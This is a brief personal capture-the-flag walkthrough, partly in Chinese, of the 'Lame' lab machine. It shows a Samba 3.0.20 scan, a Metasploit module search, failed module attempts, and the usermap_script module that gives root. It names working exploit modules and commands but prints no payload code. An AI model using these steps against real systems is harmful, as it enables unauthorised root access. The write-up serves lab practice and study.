lame（samba）

10.10.10.3

scan

139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

linux os

这个training应该很简单，以前做过： 139端口——smbclient

得知服务版本 Samba 3.0.20-Debian

trying 1

locate exploits/linux/remote/9950.rb
[*] exec: locate exploits/linux/remote/9950.rb

/root/exploit-database/exploits/linux/remote/9950.rb
/usr/share/exploitdb/exploits/linux/remote/9950.rb

msfconsole
search -h
search platform:linux type:exploit samba
 exploit/linux/samba/chain_reply          2010-06-16       good       No     Samba chain_reply Memory Corruption (Linux x86)
   exploit/linux/samba/is_known_pipename    2017-03-24       excellent  Yes    Samba is_known_pipename() Arbitrary Module Load
   exploit/linux/samba/lsa_transnames_heap  2007-05-14       good       Yes    Samba lsa_io_trans_names Heap Overflow
   exploit/linux/samba/setinfopolicy_heap   2012-04-10       normal     Yes    Samba SetInformationPolicy AuditEventsInfo Heap Overflow
   exploit/linux/samba/trans2open           2003-04-07       great      No     Samba trans2open Overflow (Linux x86)
   exploit/multi/samba/nttrans              2003-04-07       average    No     Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow

use exploit/linux/samba/setinfopolicy_heap
show options 
查看Exploit target:
2:3.5.11~dfsg-1ubuntu2 on Ubuntu Server 11.10 
这个payload目标不对，于是
back

导入msf载荷

cd /root/.msf4/modules/exploits/
mkdir samba3.0.21-3.0.24 
cd samba*
cp /root/exploit-database/exploits/linux/remote/9950.rb .

重新启动msfconsole
search samba3

突然发现，目标版本好像不符合条件，samba3.0.21-3.0.24

ORZ，太粗心了

trying2:

Samba < 3.0.20 - Remote Heap Overflow exp是一些C代码，需要编译运行，而且注释是意大利语的。。

trying3:

google搜索Samba 3.0.20 https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script

exploit/multi/samba/usermap_script

执行后，直接就是root权限